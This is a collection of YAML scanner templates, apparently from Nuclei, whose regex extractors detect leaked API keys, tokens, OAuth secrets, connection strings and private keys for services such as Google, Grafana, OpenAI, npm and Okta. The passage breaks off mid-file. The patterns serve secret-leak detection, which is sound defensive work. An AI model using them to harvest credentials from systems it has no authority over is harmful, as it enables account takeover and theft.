-------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/google/google-clientid.yaml: -------------------------------------------------------------------------------- 1 | id: google-clientid 2 | 3 | info: 4 | name: Google Client ID 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/google.yml 9 | metadata: 10 | verified: true 11 | tags: file,keys,google,token 12 | file: 13 | - extensions: 14 | - all 15 | 16 | extractors: 17 | - type: regex 18 | part: body 19 | regex: 20 | - '(?i)\b([0-9]+-[a-z0-9_]{32})\.apps\.googleusercontent\.com' 21 | # digest: 4a0a0047304502204d6ddfacde924e20772b34f26f8f705be85f7bf5bc9078c729a7f7edc99a9dcf022100a64c8e922783d1374f6cbc1f132b56a1efd3de3c59a2ed6ba3d3266225e7ffa4:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/google/google-oauth-clientsecret.yaml: -------------------------------------------------------------------------------- 1 | id: google-oauth-clientsecret 2 | 3 | info: 4 | name: Google OAuth Client Secret (prefixed) 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/google.yml 9 | metadata: 10 | verified: true 11 | tags: file,keys,google,token 12 | file: 13 | - extensions: 14 | - all 15 | 16 | extractors: 17 | - type: regex 18 | part: body 19 | regex: 20 | - '(GOCSPX-[a-zA-Z0-9_-]{28})' 21 | # digest: 4a0a004730450220157b3e82f90478510f0f71167cfa1f517878cfc309707142fa439d38149c8a1a022100a54beacb6de85b38bddad57f4d7090ba367df0825c9c4fbfa165f7cb8ae0d4e9:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/grafana/grafana-api-key.yaml: -------------------------------------------------------------------------------- 1 | id: grafana-api-key 2 | 3 | info: 4 | name: Grafana API Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-api-key.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-api-key.go 10 | metadata: 11 | verified: true 12 | tags: grafana,file,keys 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (?i)\b(eyJrIjoi[A-Za-z0-9]{70,400}={0,2})(?:['|\"|\n|\r|\s|\x60|;]|$) 22 | 23 | # digest: 4a0a00473045022100f94f26615c01ee3669910469b31e0011b160852246ed76ae9802f34d6be1911c022076cd3f3e6b5257f59db3fb098baf801c44b0a628196d408b70d1765bb646a7c9:922c64590222798bb761d5b6d8e72950 24 | -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/grafana/grafana-cloud-api-token.yaml: -------------------------------------------------------------------------------- 1 | id: grafana-cloud-api-token 2 | 3 | info: 4 | name: Grafana Cloud API Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-cloud-api-token.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-cloud-api-token.go 10 | metadata: 11 | verified: true 12 | tags: grafana,file,keys 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (?i)\b(glc_[A-Za-z0-9+/]{32,400}={0,2})(?:['|\"|\n|\r|\s|\x60|;]|$) 22 | 23 | # digest: 4a0a00473045022100ac8747d010f2f8ecbbf15e54c1a4f79e1e965927e8077c7e25d72c003adf0d9a02205ec44b2c0ae24af123d96ec3b31d842f77287892e7f1f5a92d08a213dd5af080:922c64590222798bb761d5b6d8e72950 24 | -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/grafana/grafana-service-account-token.yaml: -------------------------------------------------------------------------------- 1 | id: grafana-service-account-token 2 | 3 | info: 4 | name: Grafana Service Account Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-service-account-token.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-service-account-token.go 10 | metadata: 11 | verified: true 12 | tags: grafana,file,keys 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (?i)\b(glsa_[A-Za-z0-9]{32}_[A-Fa-f0-9]{8})(?:['|\"|\n|\r|\s|\x60|;]|$) 22 | 23 | # digest: 4b0a00483046022100d0d2caaae6ee74a09fb5d24db235ba021d75800eafa6dbc83777ac9213de0eff022100f4dde19703abd7a8925d6b3dbcfa20ac5d7e72e6f670baed1ea04e57e3fdfd5a:922c64590222798bb761d5b6d8e72950 24 | -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/hashicorp-api-token.yaml: -------------------------------------------------------------------------------- 1 | id: hashicorp-api-token 2 | 3 | info: 4 | name: Hashicorp API Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/hashicorp-tf-api-token.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/hashicorp-tf-api-token.go 10 | metadata: 11 | verified: true 12 | tags: hashicorp,file,keys 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (?i)[a-z0-9]{14}\.atlasv1\.[a-z0-9\-_=]{60,70} 22 | 23 | # digest: 490a004630440220077946f13881a3f72dcf81af66d6441c54bcfa9ebf55bb2a9b9b8e16ca48f82c022071b09b7aa278782ba81b70d8da7eed2b6876da0e551fc1a23533e1d67f4cce02:922c64590222798bb761d5b6d8e72950 24 | -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/heroku-key.yaml: -------------------------------------------------------------------------------- 1 | id: heroku-key 2 | 3 | info: 4 | name: Heroku API Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/heroku.yml 9 | - https://devcenter.heroku.com/articles/authentication 10 | metadata: 11 | verified: true 12 | tags: file,keys,heroku,token 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - '(?i)heroku.{0,20}key.{0,20}\b([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\b' 22 | # digest: 4a0a00473045022100e9a5fe2b9b5307955ba8c070625b450f87018040278cac9d857936ad0a3b43fc022030fdf2d770b0a7de20c15055be3d5c8cde50df6937d8ebf01072ac9f83b9f461:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/huggingface/huggingface-user-access.yaml: -------------------------------------------------------------------------------- 1 | id: huggingface-user-access 2 | 3 | info: 4 | name: HuggingFace User Access Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/huggingface.yml 9 | - https://huggingface.co/docs/hub/security-tokens 10 | metadata: 11 | verified: true 12 | tags: huggingface,keys,file 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - '\b(hf_[a-zA-Z]{34})\b' 23 | # digest: 4b0a00483046022100934e5db46a96a95fbd52e60737825b1ed564ae6f42363a5843a5317f25c8b15d0221008fd6451b353118cd6c0b7a054f49e79c36d5c4222658de97e4b5fea6731da789:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/jenkins-token.yaml: -------------------------------------------------------------------------------- 1 | id: jenkins-token 2 | 3 | info: 4 | name: Jenkins Token or Crumb 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/jenkins.yml 9 | - https://www.jenkins.io/blog/2018/07/02/new-api-token-system/ 10 | - https://www.jenkins.io/doc/book/security/csrf-protection/ 11 | metadata: 12 | verified: true 13 | tags: file,keys,jenkins,crumb,token 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - '(?i)jenkins.{0,10}(?:crumb)?.{0,10}\b([0-9a-f]{32,36})\b' 23 | # digest: 4b0a00483046022100bbae117ce6e36c2edabf974fd82254d93119455c3ffaae610bba874bb154fd14022100c94a0e7d792202691a4e8608e7cefcf2bcd0323c9b4c9dacb555345000ec4b0b:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/kubernetes/kubernetes-dockercfg-secret.yaml: -------------------------------------------------------------------------------- 1 | id: kubernetes-dockercfg-secret 2 | 3 | info: 4 | name: kubernetes.io/dockercfg Secret 5 | author: dwisiswant0 6 | severity: info 7 | reference: 8 | - https://blog.aquasec.com/the-ticking-supply-chain-attack-bomb-of-exposed-kubernetes-secrets 9 | metadata: 10 | verified: true 11 | tags: kubernetes,k8s,file,keys,secret 12 | 13 | file: 14 | - extensions: 15 | - yaml 16 | - yml 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - \.dockercfg:\s+["']?e(w|y)[\w=]+["']? 23 | # digest: 4b0a0048304602210084bb6909a2c7963a555e1075de093962ffd4e4b125d3dd1bb559eccf252e697c022100d2e745493ab0b3a250e96f74744924d34f1cb1cf18b265e81ebba442c3eb52ad:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/kubernetes/kubernetes-dockerconfigjson-secret.yaml: -------------------------------------------------------------------------------- 1 | id: kubernetes-dockerconfigjson-secret 2 | 3 | info: 4 | name: kubernetes.io/dockerconfigjson Secret 5 | author: dwisiswant0 6 | severity: info 7 | reference: 8 | - https://blog.aquasec.com/the-ticking-supply-chain-attack-bomb-of-exposed-kubernetes-secrets 9 | metadata: 10 | verified: true 11 | tags: kubernetes,k8s,file,keys,secret 12 | 13 | file: 14 | - extensions: 15 | - yaml 16 | - yml 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - \.dockerconfigjson:\s+["']?e(w|y)[\w=]+["']? 23 | # digest: 490a0046304402205837efe22bf2818e0eff1697ee0cfa3f5e769e3c20fa63e1291c6243d921daa202207523ce58ac252a1a71bbbf192eb381aa08631c976b1860127bf5e77441876053:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/linkedin-id.yaml: -------------------------------------------------------------------------------- 1 | id: linkedin-id 2 | 3 | info: 4 | name: Linkedin Client ID 5 | author: gaurang 6 | severity: low 7 | tags: file,keys,token,linkedin 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "(?i)linkedin(.{0,20})?(?-i)[0-9a-z]{12}" 16 | # digest: 4a0a0047304502203d8afe36515a2055a46a90e36140bedad012308b2ee65ab71a018d3ebd0d502d022100e1ed5b6faf198657fe22358330ac6eb9dfbc042875faafbef04b8fa083eeecf9:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/linkedin/linkedin-client.yaml: -------------------------------------------------------------------------------- 1 | id: linkedin-client 2 | 3 | info: 4 | name: LinkedIn Client ID 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/linkedin.yml 9 | - https://docs.microsoft.com/en-us/linkedin/shared/api-guide/best-practices/secure-applications 10 | metadata: 11 | verified: true 12 | tags: linkedin,keys,file 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - (?i)linkedin.?(?:api|app|application|client|consumer|customer)?.?(?:id|identifier|key).{0,2}\s{0,20}.{0,2}\s{0,20}.{0,2}\b([a-z0-9]{12,14})\b 23 | # digest: 4a0a00473045022100ade417f9932824017914990383cd867a37ba57dd1badc60aa55dac97e73cbf3f02203bb0babcad422204af64f70926c18827b3940c69f909d205f440468d18b0bb31:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/linkedin/linkedin-secret.yaml: -------------------------------------------------------------------------------- 1 | id: linkedin-secret 2 | 3 | info: 4 | name: LinkedIn Secret Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/linkedin.yml 9 | - https://docs.microsoft.com/en-us/linkedin/shared/api-guide/best-practices/secure-applications 10 | metadata: 11 | verified: true 12 | tags: linkedin,keys,file 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - (?i)linkedin.?(?:api|app|application|client|consumer|customer|secret|key).?(?:key|oauth|sec|secret)?.{0,2}\s{0,20}.{0,2}\s{0,20}.{0,2}\b([a-z0-9]{16})\b 23 | # digest: 4a0a0047304502205def151b767d6270018ea90666e56089b0dde70467ca94489c6ab9ec0b735fe2022100ea3cee5471199b7e21bd6a63b75a667adcddad7281d249e83cbb8eb8cda82fd7:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/mailchimp-api.yaml: -------------------------------------------------------------------------------- 1 | id: mailchimp-api-key 2 | 3 | info: 4 | name: Mailchimp API Key 5 | author: gaurang 6 | severity: high 7 | tags: keys,file,token,mailchimp 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "[0-9a-f]{32}-us[0-9]{1,2}" 16 | # digest: 4a0a00473045022100b7d7dc7f716b2b6aa9f8fc0e8f2455cd4598868f7cdf43257e6359058f2bb4ab02201b98b540e564948f56babb33b53688a32a426e54dc32d0ca159d70eebb798191:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/mailgun-api.yaml: -------------------------------------------------------------------------------- 1 | id: mailgun-api-key 2 | 3 | info: 4 | name: Mailgun API Key 5 | author: gaurang 6 | severity: high 7 | tags: file,keys,token,mailgun 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "key-[0-9a-zA-Z]{32}" 16 | # digest: 4a0a00473045022006098cd86f41bfb24a9c4c7c6bfc1a855c71c69e8b834739e5ffc4567261266c022100bd407109d7d54367361ebda630747d01a6ba308679d3f50a1654629aa9da4873:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/mapbox-token.yaml: -------------------------------------------------------------------------------- 1 | id: mapbox-token 2 | 3 | info: 4 | name: Mapbox Token 5 | author: Devang-Solanki 6 | severity: medium 7 | reference: 8 | - https://docs.gitguardian.com/secrets-detection/detectors/specifics/mapbox_token 9 | - https://github.com/zricethezav/gitleaks/blob/master/cmd/generate/config/rules/mapbox.go 10 | metadata: 11 | verified: true 12 | tags: file,keys,token,mapbox 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | name: mapbox-public-token 20 | part: body 21 | regex: 22 | - 'pk\.eyJ1Ijoi\w+\.[\w-]*' 23 | 24 | - type: regex 25 | name: mapbox-secret-token 26 | part: body 27 | regex: 28 | - 'sk\.eyJ1Ijoi\w+\.[\w-]*' 29 | # digest: 4a0a00473045022100a7ea48306be5c2b2cfc395952e068bd2e299957868b11ba57c2c45fa49ff188502201ba10a29d5332a82ed0fa1c984668ce2df5e2213391127664a2eef6a04a299a9:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/newrelic/newrelic-api-service.yaml: -------------------------------------------------------------------------------- 1 | id: newrelic-api-service 2 | 3 | info: 4 | name: New Relic API Service Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/newrelic.yml 9 | - https://docs.newrelic.com/docs/apis/intro-apis/new-relic-api-keys 10 | - https://docs.newrelic.com/docs/apis/intro-apis/new-relic-api-keys/#user-key 11 | metadata: 12 | verified: true 13 | tags: newrelic,keys,file 14 | 15 | file: 16 | - extensions: 17 | - all 18 | 19 | extractors: 20 | - type: regex 21 | part: body 22 | regex: 23 | - (?i)\b(nrak-[a-z0-9]{27})\b 24 | # digest: 4a0a00473045022100b0305a1f0644ca813e1b1408183fb6100e36a5ccf5716a072f32d60cf9956d7102207b59c7dc0411cc69bf362c9a1035ac73c61bccbabbbfeea75aa3eff7db628214:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/newrelic/newrelic-license.yaml: -------------------------------------------------------------------------------- 1 | id: newrelic-license 2 | 3 | info: 4 | name: New Relic License Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/newrelic.yml 9 | - https://docs.newrelic.com/docs/apis/intro-apis/new-relic-api-keys 10 | - https://docs.newrelic.com/docs/apis/intro-apis/new-relic-api-keys/#license-key 11 | metadata: 12 | verified: true 13 | tags: newrelic,keys,file 14 | 15 | file: 16 | - extensions: 17 | - all 18 | 19 | extractors: 20 | - type: regex 21 | part: body 22 | regex: 23 | - (?i)\b([a-z0-9]{6}[a-f0-9]{30}nral)\b 24 | # digest: 4b0a00483046022100e041b8d63bb59009c36c1d2f8b42a95d352acb3c8d0345afae5b908a78ab8f090221009e2de0a5b782aa3b65c7cbf357c0c7cd47497bef6ade233b239afa63ff863fff:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/newrelic/newrelic-pixie-apikey.yaml: -------------------------------------------------------------------------------- 1 | id: newrelic-pixie-apikey 2 | 3 | info: 4 | name: New Relic Pixie API Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/newrelic.yml 9 | - https://docs.px.dev/reference/admin/api-keys/ 10 | metadata: 11 | verified: true 12 | tags: file,keys,newrelic,pixie,token 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - "(px-api-[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})" 22 | # digest: 4a0a00473045022100c87ef60160177e4dd9cf059f2a4fb1feb922f1dc810beec9f3153393645edb8d0220317d229ff5d7af76fce023056bc85f19f45ff91efeb256c4fca4137237156ad0:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/newrelic/newrelic-pixie-deploykey.yaml: -------------------------------------------------------------------------------- 1 | id: newrelic-pixie-deploykey 2 | 3 | info: 4 | name: New Relic Pixie Deploy Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/newrelic.yml 9 | - https://docs.px.dev/reference/admin/api-keys/ 10 | metadata: 11 | verified: true 12 | tags: file,keys,newrelic,pixie,token 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - "(px-dep-[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})" 22 | # digest: 4a0a0047304502203c71b329d4ef2552fb587dfa8d1a5717b95763f35295f0d2cb52eee420376850022100ac94ca2b4d48c633bf969eebd6fcbaff6894322bda4e05bce3129184cbfdd205:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/npm-accesstoken.yaml: -------------------------------------------------------------------------------- 1 | id: npm-accesstoken 2 | 3 | info: 4 | name: NPM Access Token (fine-grained) 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/npm.yml 9 | - https://docs.npmjs.com/about-access-tokens 10 | - https://github.com/github/roadmap/issues/557 11 | - https://github.blog/changelog/2022-12-06-limit-scope-of-npm-tokens-with-the-new-granular-access-tokens/ 12 | metadata: 13 | verified: true 14 | tags: keys,file,npm,token 15 | file: 16 | - extensions: 17 | - all 18 | 19 | extractors: 20 | - type: regex 21 | part: body 22 | regex: 23 | - "\b(npm_[A-Za-z0-9]{36})\b" 24 | # digest: 490a00463044022039866b0873f183f09afcd27823a4cc86515fb680c821d4ed80919cfa1ff69ac502202599aa40303d5467e19c13645105ca6c34c17796b73d6fabba5631c2476b3a73:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/nuget-key.yaml: -------------------------------------------------------------------------------- 1 | id: nuget-key 2 | 3 | info: 4 | name: NuGet API Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/nuget.yml 9 | - https://docs.microsoft.com/en-us/nuget/nuget-org/publish-a-package#create-api-keys 10 | metadata: 11 | verified: true 12 | tags: keys,file,nuget,token 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - "(oy2[a-z0-9]{43})" 22 | # digest: 4a0a004730450221009ee6a3a09c234f4c41ee6c71b99a1461f714627ed8456ccd26fcd90b919ae3ec02203456759520c590ad30114fbac0a6723adb8c53dfd531b655d1af290117c24c04:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/odbc/odbc-connection.yaml: -------------------------------------------------------------------------------- 1 | id: odbc-connection 2 | 3 | info: 4 | name: ODBC Connection String 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/odbc.yml 9 | metadata: 10 | verified: true 11 | tags: odbc,keys,file 12 | 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (?i)(?:User|User\sId|UserId|Uid)\s*=\s*([^\s;]{3,100})\s*;[\ \t]*.{0,10}[\ \t]*(?:Password|Pwd)\s*=\s*([^\t\ ;]{3,100})\s*(?:[;]|$) 22 | # digest: 4a0a004730450221009cdd18eb9c779b2230d9b141a315ef98d1da77f0173be2da4d099c46e3b5c46f02207ae6fac5ccfbcbe6ab6902e3e4431449873bf31680040ec3b616c0e3750e1c4d:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/okta/okta-api.yaml: -------------------------------------------------------------------------------- 1 | id: okta-api 2 | 3 | info: 4 | name: Okta API Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/okta.yml 9 | - https://devforum.okta.com/t/api-token-length/5519 10 | - https://developer.okta.com/docs/guides/create-an-api-token/main/ 11 | metadata: 12 | verified: true 13 | tags: okta,keys,file 14 | 15 | file: 16 | - extensions: 17 | - all 18 | 19 | extractors: 20 | - type: regex 21 | part: body 22 | regex: 23 | - (?i)(?s)(?:okta|ssws).{0,40}\b(00[a-z0-9_-]{39}[a-z0-9_])\b 24 | # digest: 4b0a0048304602210099f31a1c5cf66963fb04f1f4a78317a1329098914e756d1a97879086ca81de74022100c51328ddf041ad3e06759c5ce691eed371adf63ef1c6d203b2a50d87b165b1f9:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/openai-key.yaml: -------------------------------------------------------------------------------- 1 | id: openai-key 2 | 3 | info: 4 | name: OpenAI API Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/openai.yml 9 | - https://platform.openai.com/docs/api-reference 10 | - https://platform.openai.com/docs/api-reference/authentication 11 | metadata: 12 | verified: true 13 | tags: file,keys,openai,token 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - \b(sk-[a-zA-Z0-9]{48})\b 23 | # digest: 4a0a004730450220546f51da9aae790d391a6842237a517f47af7be274bdfa184f865fef630755fb022100fd67b83c7512040fa26564d51c5b03b08f6dc269a73b1fed32b696c5809bbc1c:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/paypal-braintree-token.yaml: -------------------------------------------------------------------------------- 1 | id: paypal-braintree-token 2 | 3 | info: 4 | name: Paypal Braintree Access Token 5 | author: gaurang 6 | severity: high 7 | tags: file,keys,token,paypal 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "access_token\\$production\\$[0-9a-z]{16}\\$[0-9a-f]{32}" 16 | # digest: 490a00463044022056d84dc6d601838e144b52aad17f5d96f5d7e968e394d85f12af03219b51d114022031accb17f2ac43db6480cb37ecd697e1c9b44aea60e02212aecf0eaa8163b0b8:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/pictatic-api-key.yaml: -------------------------------------------------------------------------------- 1 | id: pictatic-api-key 2 | 3 | info: 4 | name: Pictatic API Key 5 | author: gaurang 6 | severity: high 7 | tags: keys,file,token 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "sk_live_[0-9a-z]{32}" 16 | # digest: 4a0a00473045022032fdd5dc224eeaffdef7c05502dfedc31e1bc930a446a4321c9b4e0943bff1c702210091f33fc218848d1e5987c600944cc9ba59195eb6891d01cd0052263c224464f8:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/postman-api-key.yaml: -------------------------------------------------------------------------------- 1 | id: postman-api-key 2 | 3 | info: 4 | name: Postman API Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/rules/postman.yml 9 | - https://learning.postman.com/docs/developer/intro-api/ 10 | metadata: 11 | verified: true 12 | tags: postman,keys,file,token 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - '\b(PMAK-[a-zA-Z0-9]{24}-[a-zA-Z0-9]{34})\b' 22 | 23 | # digest: 4b0a00483046022100e158e3c9539a86553368be020b6a63e4d2d7383d5ebabfc763746408d78466c3022100dd689e22c94823f880d079b79edb861cfc02f9dd2118c70b8fc23efe6047c933:922c64590222798bb761d5b6d8e72950 24 | -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/private-key.yaml: -------------------------------------------------------------------------------- 1 | id: private-key 2 | 3 | info: 4 | name: Private Key Detect 5 | author: gaurang,geeknik 6 | severity: high 7 | tags: file,keys,token 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "BEGIN OPENSSH PRIVATE KEY" 16 | - "BEGIN PRIVATE KEY" 17 | - "BEGIN RSA PRIVATE KEY" 18 | - "BEGIN DSA PRIVATE KEY" 19 | - "BEGIN EC PRIVATE KEY" 20 | - "BEGIN PGP PRIVATE KEY BLOCK" 21 | - "ssh-rsa" 22 | - "ssh-dsa" 23 | - "ssh-ed25519" 24 | # digest: 4a0a004730450220012882f3d65764d754d5f19daface386c18880d36acae666c3661a7b5fac3489022100fbcfdc07b0b9362befde988d181bf2f3af23847bcb67d65249c51c918db3a4db:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/pypi-token.yaml: -------------------------------------------------------------------------------- 1 | id: pypi-token 2 | 3 | info: 4 | name: PyPI Upload Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/pypi.yml 9 | - https://github.com/pypa/warehouse/issues/6051 10 | - https://pypi.org/project/pypitoken/ 11 | metadata: 12 | verified: true 13 | tags: file,keys,pypi,token 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - "(pypi-AgEIcHlwaS5vcmc[a-zA-Z0-9_-]{50,})" 23 | # digest: 4b0a004830460221008fd309bb55fdcb10af63f0e5c49e66f96b5b63598001fd085e6ad1d7db4676480221009f8481869b196778dc1aa0a750367371173d1f41449f4dcb5cb906eaaa9f377b:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/razorpay-client-id.yaml: -------------------------------------------------------------------------------- 1 | id: razorpay-client-id 2 | 3 | info: 4 | name: Razorpay Client ID 5 | author: Devang-Solanki 6 | severity: high 7 | reference: 8 | - https://github.com/streaak/keyhacks#Razorpay-keys 9 | - https://docs.gitguardian.com/secrets-detection/detectors/specifics/razorpay_apikey 10 | tags: file,keys,token,razorpay 11 | file: 12 | - extensions: 13 | - all 14 | 15 | extractors: 16 | - type: regex 17 | regex: 18 | - "rzp_(live|test)_.{14}" 19 | # digest: 490a00463044022017958bca8d151dc9ccf82c6616ee782cd94dcfb9604195b37eab0e712de46b3a02205a23692aefd5d8b35b942ea874507b2b25b217c384ac028b05bf3882293cb32e:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/react/reactapp-password.yaml: -------------------------------------------------------------------------------- 1 | id: reactapp-password 2 